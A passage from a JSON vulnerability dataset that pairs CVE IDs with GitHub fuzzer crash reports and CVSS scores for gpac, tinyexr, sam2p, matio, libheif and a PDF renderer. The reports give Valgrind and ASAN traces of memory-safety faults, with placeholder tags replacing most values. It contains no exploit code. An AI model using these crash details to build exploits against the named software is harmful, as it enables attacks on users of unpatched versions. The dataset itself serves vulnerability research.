NUMBERTAG at NUMBERTAG C NUMBERTAG APITAG (in PATHTAG NUMBERTAG by NUMBERTAG ADDC: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG A: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG F: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG FD: APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG C NUMBERTAG APITAG (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , unsigned char , APITAG int, int, int) (in PATHTAG NUMBERTAG by NUMBERTAG Gfx::go(int) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG E: APITAG , double, double, int, int, int, int, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG A: APITAG , double, double, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG BCBD: APITAG , int, double, double, int, int, int, int, int ( )(void ), void ) (in PATHTAG NUMBERTAG Address NUMBERTAG b NUMBERTAG bc is NUMBERTAG bytes after a block of size NUMBERTAG alloc'd NUMBERTAG at NUMBERTAG C2DB8F: malloc (in PATHTAG NUMBERTAG by NUMBERTAG E NUMBERTAG gmalloc (in PATHTAG NUMBERTAG by NUMBERTAG E NUMBERTAG gmallocn (in PATHTAG NUMBERTAG by NUMBERTAG F: APITAG , int, int, int, int, int, int, int) (in PATHTAG NUMBERTAG by NUMBERTAG CE NUMBERTAG APITAG , Stream , Object ) (in PATHTAG NUMBERTAG by NUMBERTAG C6AF: APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG AFF: APITAG , unsigned char , APITAG int, int, int) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , unsigned char , APITAG int, int, int) (in PATHTAG NUMBERTAG by NUMBERTAG FA NUMBERTAG APITAG int, Object ) (in PATHTAG NUMBERTAG by NUMBERTAG A9: APITAG , Object ) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG APITAG , double, double, int, int, int, int, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG A: APITAG , double, double, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG Invalid read of size NUMBERTAG at NUMBERTAG C4C: APITAG 
(in PATHTAG NUMBERTAG by NUMBERTAG ADDC: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG A: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG F: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG FD: APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG C NUMBERTAG APITAG (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , unsigned char , APITAG int, int, int) (in PATHTAG NUMBERTAG by NUMBERTAG Gfx::go(int) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG E: APITAG , double, double, int, int, int, int, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG A: APITAG , double, double, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG BCBD: APITAG , int, double, double, int, int, int, int, int ( )(void ), void ) (in PATHTAG NUMBERTAG Address NUMBERTAG b NUMBERTAG bc is NUMBERTAG bytes after a block of size NUMBERTAG alloc'd NUMBERTAG at NUMBERTAG C2DB8F: malloc (in PATHTAG NUMBERTAG by NUMBERTAG E NUMBERTAG gmalloc (in PATHTAG NUMBERTAG by NUMBERTAG E NUMBERTAG gmallocn (in PATHTAG NUMBERTAG by NUMBERTAG F: APITAG , int, int, int, int, int, int, int) (in PATHTAG NUMBERTAG by NUMBERTAG CE NUMBERTAG APITAG , Stream , Object ) (in PATHTAG NUMBERTAG by NUMBERTAG C6AF: APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG AFF: APITAG , unsigned char , APITAG int, int, int) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , unsigned char , APITAG int, int, int) (in PATHTAG NUMBERTAG by NUMBERTAG FA NUMBERTAG APITAG int, Object ) (in PATHTAG NUMBERTAG by NUMBERTAG A9: APITAG , Object ) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG APITAG , double, double, int, int, int, int, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG A: APITAG , double, double, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG Invalid read of size NUMBERTAG at NUMBERTAG C NUMBERTAG APITAG (in PATHTAG NUMBERTAG by NUMBERTAG 
ADDC: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG A: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG F: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG FD: APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG C NUMBERTAG APITAG (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , unsigned char , APITAG int, int, int) (in PATHTAG NUMBERTAG by NUMBERTAG Gfx::go(int) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG E: APITAG , double, double, int, int, int, int, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG A: APITAG , double, double, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG BCBD: APITAG , int, double, double, int, int, int, int, int ( )(void ), void ) (in PATHTAG NUMBERTAG Address NUMBERTAG b NUMBERTAG bc is NUMBERTAG bytes after a block of size NUMBERTAG alloc'd NUMBERTAG at NUMBERTAG C2DB8F: malloc (in PATHTAG NUMBERTAG by NUMBERTAG E NUMBERTAG gmalloc (in PATHTAG NUMBERTAG by NUMBERTAG E NUMBERTAG gmallocn (in PATHTAG NUMBERTAG by NUMBERTAG F: APITAG , int, int, int, int, int, int, int) (in PATHTAG NUMBERTAG by NUMBERTAG CE NUMBERTAG APITAG , Stream , Object ) (in PATHTAG NUMBERTAG by NUMBERTAG C6AF: APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG AFF: APITAG , unsigned char , APITAG int, int, int) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , unsigned char , APITAG int, int, int) (in PATHTAG NUMBERTAG by NUMBERTAG FA NUMBERTAG APITAG int, Object ) (in PATHTAG NUMBERTAG by NUMBERTAG A9: APITAG , Object ) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG APITAG , double, double, int, int, int, int, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG A: APITAG , double, double, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG Invalid read of size NUMBERTAG at NUMBERTAG CBF: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG ADDC: APITAG (in PATHTAG NUMBERTAG by 
NUMBERTAG A: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG F: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG FD: APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG C NUMBERTAG APITAG (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , unsigned char , APITAG int, int, int) (in PATHTAG NUMBERTAG by NUMBERTAG Gfx::go(int) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG E: APITAG , double, double, int, int, int, int, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG A: APITAG , double, double, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG BCBD: APITAG , int, double, double, int, int, int, int, int ( )(void ), void ) (in PATHTAG NUMBERTAG Address NUMBERTAG b NUMBERTAG bc is NUMBERTAG bytes after a block of size NUMBERTAG alloc'd NUMBERTAG at NUMBERTAG C2DB8F: malloc (in PATHTAG NUMBERTAG by NUMBERTAG E NUMBERTAG gmalloc (in PATHTAG NUMBERTAG by NUMBERTAG E NUMBERTAG gmallocn (in PATHTAG NUMBERTAG by NUMBERTAG F: APITAG , int, int, int, int, int, int, int) (in PATHTAG NUMBERTAG by NUMBERTAG CE NUMBERTAG APITAG , Stream , Object ) (in PATHTAG NUMBERTAG by NUMBERTAG C6AF: APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG AFF: APITAG , unsigned char , APITAG int, int, int) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , unsigned char , APITAG int, int, int) (in PATHTAG NUMBERTAG by NUMBERTAG FA NUMBERTAG APITAG int, Object ) (in PATHTAG NUMBERTAG by NUMBERTAG A9: APITAG , Object ) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG APITAG , double, double, int, int, int, int, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG A: APITAG , double, double, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG Error: Unknown operator 
'\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\u007f\ufffd\ufffd\ufffd\u001f\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd' Error: Unknown operator NUMBERTAG Error: Unknown operator NUMBERTAG Invalid write of size NUMBERTAG at NUMBERTAG C7A2: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG BEB: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG A5AA: APITAG , double, double, int, int, int, int, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG A: APITAG , double, double, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG BCBD: APITAG , int, double, double, int, int, int, int, int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG BD NUMBERTAG APITAG , int, int, double, double, int, int, int, int, int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG A: main APITAG NUMBERTAG Address NUMBERTAG fdccfdb8fdb NUMBERTAG is not stack'd, malloc'd or (recently) free'd NUMBERTAG Process terminating with default action of signal NUMBERTAG SIGSEG NUMBERTAG General Protection Fault NUMBERTAG at NUMBERTAG C7A2: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG BEB: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG A5AA: APITAG , double, double, int, int, int, int, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG A: APITAG , double, double, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG BCBD: APITAG , int, double, double, int, int, int, int, int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG BD NUMBERTAG APITAG , int, int, double, double, int, int, int, int, int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG A: main APITAG NUMBERTAG HEAP SUMMARY NUMBERTAG in use at exit NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG total heap usage NUMBERTAG allocs NUMBERTAG frees NUMBERTAG 
bytes allocated NUMBERTAG LEAK SUMMARY NUMBERTAG definitely lost NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG indirectly lost NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG possibly lost NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG still reachable NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG suppressed NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG Rerun with leak check=full to see details of leaked memory NUMBERTAG For counts of detected and suppressed errors, rerun with NUMBERTAG ERROR SUMMARY NUMBERTAG errors from NUMBERTAG contexts (suppressed NUMBERTAG from NUMBERTAG Segmentation fault ~~~ Thanks, Manh Dung",
  51515. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  51516. "severity": "MEDIUM",
  51517. "baseScore": 5.5,
  51518. "impactScore": 3.6,
  51519. "exploitabilityScore": 1.8
  51520. },
  51521. {
  51522. "CVE_ID": "CVE-2020-19481",
  51523. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1267",
  51524. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1267",
  51525. "Repo_new": "gpac/gpac",
  51526. "Issue_Created_At": "2019-07-05T23:55:18Z",
  51527. "description": "Runtime error: member access within null pointer of type 'GF_M2TS_ES NUMBERTAG APITAG Hi, Our fuzzer found a crash on APITAG (the latest commit NUMBERTAG b on master). APITAG URLTAG Command: APITAG info APITAG ASAN says: ~~~ Multiple different PAT on single TS found, ignoring new PAT declaration (table id NUMBERTAG extended table id NUMBERTAG MPEG NUMBERTAG TS] Invalid PMT es descriptor size for PID NUMBERTAG MPEG NUMBERTAG TS] PID NUMBERTAG reused across programs NUMBERTAG and NUMBERTAG not completely supported PATHTAG runtime error: member access within null pointer of type 'GF_M2TS_ES NUMBERTAG algrind says NUMBERTAG Invalid read of size NUMBERTAG at APITAG gf_m2ts_process_pmt APITAG NUMBERTAG by APITAG gf_m2ts_section_complete APITAG NUMBERTAG by APITAG APITAG APITAG NUMBERTAG by APITAG gf_m2ts_process_packet APITAG NUMBERTAG by APITAG gf_m2ts_process_data APITAG NUMBERTAG by APITAG gf_m2ts_probe_file APITAG NUMBERTAG by APITAG gf_media_import APITAG NUMBERTAG by NUMBERTAG B NUMBERTAG B: convert_file_info APITAG NUMBERTAG by NUMBERTAG D5: APITAG APITAG NUMBERTAG by NUMBERTAG BC NUMBERTAG F: (below main) (libc APITAG NUMBERTAG Address NUMBERTAG is not stack'd, malloc'd or (recently) free'd ~~~ Thanks, Manh Dung",
  51528. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  51529. "severity": "MEDIUM",
  51530. "baseScore": 5.5,
  51531. "impactScore": 3.6,
  51532. "exploitabilityScore": 1.8
  51533. },
  51534. {
  51535. "CVE_ID": "CVE-2020-19481",
  51536. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1266",
  51537. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1266",
  51538. "Repo_new": "gpac/gpac",
  51539. "Issue_Created_At": "2019-07-05T23:46:50Z",
  51540. "description": "Runtime error: left shift of NUMBERTAG by NUMBERTAG places cannot be represented in type 'int' APITAG Hi, Our fuzzer found a crash on APITAG (the latest commit NUMBERTAG b on master). APITAG URLTAG Command: APITAG info APITAG ASAN says: ~~~ PATHTAG runtime error: left shift of NUMBERTAG by NUMBERTAG places cannot be represented in type 'int' ~~~ Valgrind says NUMBERTAG Invalid read of size NUMBERTAG at APITAG gf_m2ts_process_pmt APITAG NUMBERTAG by APITAG gf_m2ts_section_complete APITAG NUMBERTAG by APITAG APITAG APITAG NUMBERTAG by APITAG gf_m2ts_process_packet APITAG NUMBERTAG by APITAG gf_m2ts_process_data APITAG NUMBERTAG by APITAG gf_m2ts_probe_file APITAG NUMBERTAG by APITAG gf_media_import APITAG NUMBERTAG by NUMBERTAG B NUMBERTAG B: convert_file_info APITAG NUMBERTAG by NUMBERTAG D5: APITAG APITAG NUMBERTAG by NUMBERTAG BC NUMBERTAG F: (below main) (libc APITAG NUMBERTAG Address NUMBERTAG d8c NUMBERTAG is NUMBERTAG bytes after a block of size NUMBERTAG alloc'd NUMBERTAG at NUMBERTAG C2DB8F: malloc (in PATHTAG NUMBERTAG by APITAG gf_m2ts_section_complete APITAG NUMBERTAG by APITAG APITAG APITAG NUMBERTAG by APITAG gf_m2ts_process_packet APITAG NUMBERTAG by APITAG gf_m2ts_process_data APITAG NUMBERTAG by APITAG gf_m2ts_probe_file APITAG NUMBERTAG by APITAG gf_media_import APITAG NUMBERTAG by NUMBERTAG B NUMBERTAG B: convert_file_info APITAG NUMBERTAG by NUMBERTAG D5: APITAG APITAG NUMBERTAG by NUMBERTAG BC NUMBERTAG F: (below main) (libc APITAG ~~~ Thanks, Manh Dung",
  51541. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  51542. "severity": "MEDIUM",
  51543. "baseScore": 5.5,
  51544. "impactScore": 3.6,
  51545. "exploitabilityScore": 1.8
  51546. },
  51547. {
  51548. "CVE_ID": "CVE-2020-19481",
  51549. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1265",
  51550. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1265",
  51551. "Repo_new": "gpac/gpac",
  51552. "Issue_Created_At": "2019-07-05T23:46:25Z",
  51553. "description": "Runtime error: left shift of negative value APITAG Hi, Our fuzzer found a crash on APITAG (the latest commit NUMBERTAG b on master) due to an invalid read on function gf_m2ts_process_pmt APITAG APITAG URLTAG Command: APITAG info APITAG ASAN says: ~~~ PATHTAG runtime error: left shift of negative value NUMBERTAG algrind says NUMBERTAG Invalid read of size NUMBERTAG at APITAG gf_m2ts_process_pmt APITAG NUMBERTAG by APITAG gf_m2ts_section_complete APITAG NUMBERTAG by APITAG APITAG APITAG NUMBERTAG by APITAG gf_m2ts_process_packet APITAG NUMBERTAG by APITAG gf_m2ts_process_data APITAG NUMBERTAG by APITAG gf_m2ts_probe_file APITAG NUMBERTAG by APITAG gf_media_import APITAG NUMBERTAG by NUMBERTAG B NUMBERTAG B: convert_file_info APITAG NUMBERTAG by NUMBERTAG D5: APITAG APITAG NUMBERTAG by NUMBERTAG BC NUMBERTAG F: (below main) (libc APITAG NUMBERTAG Address NUMBERTAG d8e NUMBERTAG is NUMBERTAG bytes before a block of size NUMBERTAG in arena \"client\" ~~~ Thanks, Manh Dung",
  51554. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  51555. "severity": "MEDIUM",
  51556. "baseScore": 5.5,
  51557. "impactScore": 3.6,
  51558. "exploitabilityScore": 1.8
  51559. },
  51560. {
  51561. "CVE_ID": "CVE-2020-19488",
  51562. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1263",
  51563. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1263",
  51564. "Repo_new": "gpac/gpac",
  51565. "Issue_Created_At": "2019-07-05T22:47:55Z",
  51566. "description": "Runtime error: member access within null pointer of type 'struct APITAG Hi, Our fuzzer found a crash on APITAG (the latest commit APITAG on master) due to a null pointer dereference bug on function APITAG APITAG APITAG URLTAG Command: APITAG info APITAG ~~~ [iso file] Read Box type data NUMBERTAG at position NUMBERTAG has size NUMBERTAG but is not at root/file level, skipping NUMBERTAG Invalid read of size NUMBERTAG at APITAG APITAG APITAG NUMBERTAG by NUMBERTAG gf_isom_box_read APITAG NUMBERTAG by NUMBERTAG gf_isom_box_parse_ex APITAG NUMBERTAG by APITAG APITAG APITAG NUMBERTAG by NUMBERTAG gf_isom_box_read APITAG NUMBERTAG by NUMBERTAG gf_isom_box_parse_ex APITAG NUMBERTAG by NUMBERTAG EEB: gf_isom_box_array_read_ex APITAG NUMBERTAG by APITAG APITAG APITAG NUMBERTAG by NUMBERTAG gf_isom_box_read APITAG NUMBERTAG by NUMBERTAG gf_isom_box_parse_ex APITAG NUMBERTAG by NUMBERTAG EEB: gf_isom_box_array_read_ex APITAG NUMBERTAG by APITAG APITAG APITAG NUMBERTAG by NUMBERTAG gf_isom_box_read APITAG NUMBERTAG by NUMBERTAG gf_isom_box_parse_ex APITAG NUMBERTAG by NUMBERTAG EEB: gf_isom_box_array_read_ex APITAG NUMBERTAG by APITAG APITAG APITAG NUMBERTAG Address NUMBERTAG is not stack'd, malloc'd or (recently) free'd Segmentation fault ~~~ ASAN says: ~~~ [iso file] Read Box type data NUMBERTAG at position NUMBERTAG has size NUMBERTAG but is not at root/file level, skipping PATHTAG runtime error: member access within null pointer of type 'struct APITAG ~~~ Thanks, Manh Dung",
  51567. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  51568. "severity": "MEDIUM",
  51569. "baseScore": 5.5,
  51570. "impactScore": 3.6,
  51571. "exploitabilityScore": 1.8
  51572. },
  51573. {
  51574. "CVE_ID": "CVE-2020-19490",
  51575. "Issue_Url_old": "https://github.com/syoyo/tinyexr/issues/124",
  51576. "Issue_Url_new": "https://github.com/syoyo/tinyexr/issues/124",
  51577. "Repo_new": "syoyo/tinyexr",
  51578. "Issue_Created_At": "2019-07-07T06:43:59Z",
  51579. "description": "Crash on APITAG Hi, Our fuzzer found a crash on tinyexr (the latest commit APITAG on master). I use your command to compile tinyexr as mentioned in NUMBERTAG URLTAG (clang++ version NUMBERTAG Ubuntu NUMBERTAG bit). APITAG URLTAG Command: test_tinyexr $POC Valgrind says NUMBERTAG Invalid write of size NUMBERTAG at NUMBERTAG B2: APITAG char , int const , unsigned char const , unsigned long, int, int, int, int, int, int, int, int, unsigned long, unsigned long, APITAG const , unsigned long, APITAG const , std::vector<unsigned long, std::allocator<unsigned long> > const&) [clone . APITAG APITAG NUMBERTAG by NUMBERTAG CD8: APITAG , APITAG const , std::vector<unsigned long long, std::allocator<unsigned long long> > const&, unsigned char const , unsigned long, std::string ) [clone . APITAG APITAG NUMBERTAG by NUMBERTAG C NUMBERTAG APITAG APITAG NUMBERTAG by NUMBERTAG C NUMBERTAG APITAG APITAG NUMBERTAG by NUMBERTAG D3A7: APITAG APITAG NUMBERTAG by NUMBERTAG B NUMBERTAG APITAG APITAG NUMBERTAG by NUMBERTAG C2: main APITAG NUMBERTAG Address NUMBERTAG ffffff NUMBERTAG b1e NUMBERTAG is not stack'd, malloc'd or (recently) free'd ~~~ ASAN says: ~~~ APITAG runtime error: signed integer overflow NUMBERTAG cannot be represented in type 'int' SUMMARY: APITAG undefined behavior APITAG in APITAG runtime error: signed integer overflow NUMBERTAG cannot be represented in type 'int' SUMMARY: APITAG undefined behavior APITAG in ASAN:DEADLYSIGNAL APITAG NUMBERTAG ERROR: APITAG SEGV on unknown address NUMBERTAG c0 (pc NUMBERTAG de NUMBERTAG bp NUMBERTAG ffe NUMBERTAG ce NUMBERTAG sp NUMBERTAG ffe NUMBERTAG c NUMBERTAG T0) APITAG signal is caused by a WRITE memory access NUMBERTAG de NUMBERTAG in APITAG char , int const , unsigned char const , unsigned long, int, int, int, int, int, int, int, int, unsigned long, unsigned long, APITAG const , unsigned long, APITAG const , std::vector<unsigned long, std::allocator<unsigned long> > const&) PATHTAG NUMBERTAG b NUMBERTAG 
fd in APITAG , APITAG const , std::vector<unsigned long long, std::allocator<unsigned long long> > const&, unsigned char const , unsigned long, APITAG std::char_traits APITAG , std::allocator APITAG > ) PATHTAG NUMBERTAG b NUMBERTAG in APITAG , APITAG const , unsigned char const , unsigned char const , unsigned long, char const ) PATHTAG NUMBERTAG fe in APITAG PATHTAG NUMBERTAG e1 in APITAG PATHTAG NUMBERTAG de1e in APITAG PATHTAG NUMBERTAG bd NUMBERTAG in main PATHTAG NUMBERTAG fdba NUMBERTAG f in __libc_start_main PATHTAG NUMBERTAG b NUMBERTAG in _start ( PATHTAG ) APITAG can not provide additional info. SUMMARY: APITAG SEGV PATHTAG in APITAG char , int const , unsigned char const , unsigned long, int, int, int, int, int, int, int, int, unsigned long, unsigned long, APITAG const , unsigned long, APITAG const , std::vector<unsigned long, std::allocator<unsigned long> > const NUMBERTAG ABORTING ~~~ Thanks, Manh Dung",
  51580. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  51581. "severity": "MEDIUM",
  51582. "baseScore": 5.5,
  51583. "impactScore": 3.6,
  51584. "exploitabilityScore": 1.8
  51585. },
  51586. {
  51587. "CVE_ID": "CVE-2020-19491",
  51588. "Issue_Url_old": "https://github.com/pts/sam2p/issues/67",
  51589. "Issue_Url_new": "https://github.com/pts/sam2p/issues/67",
  51590. "Repo_new": "pts/sam2p",
  51591. "Issue_Created_At": "2019-07-18T11:15:24Z",
  51592. "description": "SEGV in APITAG APITAG Hi, I found a crash in the function APITAG on the latest commit APITAG of master. It seems that it is due to an incomplete patch of NUMBERTAG URLTAG . APITAG URLTAG Command: sam2p APITAG FILETAG ASAN says NUMBERTAG ERROR: APITAG SEGV on unknown address NUMBERTAG pc NUMBERTAG bp NUMBERTAG fff NUMBERTAG aaa0 sp NUMBERTAG fff NUMBERTAG aa NUMBERTAG T NUMBERTAG in APITAG , int, unsigned char ) PATHTAG NUMBERTAG e9df in APITAG ) PATHTAG NUMBERTAG ec NUMBERTAG in in_gif_reader PATHTAG NUMBERTAG in APITAG , APITAG const&, char const ) PATHTAG NUMBERTAG f3 in APITAG Files::FILEW&, char const const , unsigned char) PATHTAG NUMBERTAG a NUMBERTAG e in main PATHTAG NUMBERTAG f4e3c NUMBERTAG f in __libc_start_main ( PATHTAG NUMBERTAG fa8 in _start ( PATHTAG ) ~~~ Thanks, Manh Dung",
  51593. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  51594. "severity": "HIGH",
  51595. "baseScore": 7.8,
  51596. "impactScore": 5.9,
  51597. "exploitabilityScore": 1.8
  51598. },
  51599. {
  51600. "CVE_ID": "CVE-2020-19497",
  51601. "Issue_Url_old": "https://github.com/tbeu/matio/issues/121",
  51602. "Issue_Url_new": "https://github.com/tbeu/matio/issues/121",
  51603. "Repo_new": "tbeu/matio",
  51604. "Issue_Created_At": "2019-07-27T07:03:07Z",
  51605. "description": "SEGV in APITAG Hi, I found a crash in APITAG (the latest commit APITAG on master). APITAG URLTAG Command: matdump APITAG ASAN says NUMBERTAG ERROR: APITAG SEGV on unknown address NUMBERTAG efcf (pc NUMBERTAG ff5bd4a NUMBERTAG ce bp NUMBERTAG ffd NUMBERTAG b NUMBERTAG sp NUMBERTAG ffd NUMBERTAG b NUMBERTAG T NUMBERTAG ff5bd4a NUMBERTAG cd in APITAG PATHTAG NUMBERTAG ff5bd4b8c NUMBERTAG in APITAG PATHTAG NUMBERTAG in main PATHTAG NUMBERTAG ff5bcc9a NUMBERTAG f in __libc_start_main ( PATHTAG NUMBERTAG b NUMBERTAG in _start ( PATHTAG ) ~~~ Thanks, Manh Dung",
  51606. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  51607. "severity": "HIGH",
  51608. "baseScore": 8.8,
  51609. "impactScore": 5.9,
  51610. "exploitabilityScore": 2.8
  51611. },
  51612. {
  51613. "CVE_ID": "CVE-2020-19498",
  51614. "Issue_Url_old": "https://github.com/strukturag/libheif/issues/139",
  51615. "Issue_Url_new": "https://github.com/strukturag/libheif/issues/139",
  51616. "Repo_new": "strukturag/libheif",
  51617. "Issue_Created_At": "2019-07-28T10:14:30Z",
  51618. "description": "Floating point exception. Hi, I found a FPE bug on the latest commit fd0c NUMBERTAG d on master. APITAG URLTAG Command: examples/heif info APITAG Valgrind says NUMBERTAG Process terminating with default action of signal NUMBERTAG SIGFPE NUMBERTAG Integer divide by zero at address NUMBERTAG AC NUMBERTAG at NUMBERTAG Fraction APITAG NUMBERTAG by NUMBERTAG operator APITAG NUMBERTAG by NUMBERTAG APITAG const APITAG NUMBERTAG by NUMBERTAG F NUMBERTAG APITAG APITAG NUMBERTAG by NUMBERTAG A NUMBERTAG A: APITAG const ) APITAG NUMBERTAG by NUMBERTAG F: heif_context_read_from_file APITAG NUMBERTAG by NUMBERTAG ERRORTAG NUMBERTAG main APITAG Floating point exception ~~~ Thanks, Manh Dung",
  51619. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  51620. "severity": "HIGH",
  51621. "baseScore": 8.8,
  51622. "impactScore": 5.9,
  51623. "exploitabilityScore": 2.8
  51624. },
  51625. {
  51626. "CVE_ID": "CVE-2020-19499",
  51627. "Issue_Url_old": "https://github.com/strukturag/libheif/issues/138",
  51628. "Issue_Url_new": "https://github.com/strukturag/libheif/issues/138",
  51629. "Repo_new": "strukturag/libheif",
  51630. "Issue_Created_At": "2019-07-28T00:11:00Z",
  51631. "description": "SEGV in APITAG Hi, I found a bug on the latest commit fd0c NUMBERTAG d on master. APITAG URLTAG Command: examples/heif convert APITAG FILETAG ASAN says NUMBERTAG ERROR: APITAG SEGV on unknown address NUMBERTAG pc NUMBERTAG c bp NUMBERTAG ffc1ade NUMBERTAG a0 sp NUMBERTAG ffc1ade NUMBERTAG T NUMBERTAG b in APITAG APITAG APITAG const PATHTAG NUMBERTAG in APITAG int, unsigned int) const PATHTAG NUMBERTAG b6 in APITAG int, unsigned int&) const PATHTAG NUMBERTAG a in APITAG const PATHTAG NUMBERTAG c1a4 in APITAG PATHTAG NUMBERTAG fc in main PATHTAG NUMBERTAG f1ac NUMBERTAG d NUMBERTAG f in __libc_start_main ( PATHTAG NUMBERTAG ERRORTAG f NUMBERTAG in _start ( PATHTAG ERRORTAG f NUMBERTAG Thanks, Manh Dung",
  51632. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  51633. "severity": "HIGH",
  51634. "baseScore": 8.8,
  51635. "impactScore": 5.9,
  51636. "exploitabilityScore": 2.8
  51637. },
  51638. {
  51639. "CVE_ID": "CVE-2020-19527",
  51640. "Issue_Url_old": "https://github.com/idreamsoft/iCMS/issues/66",
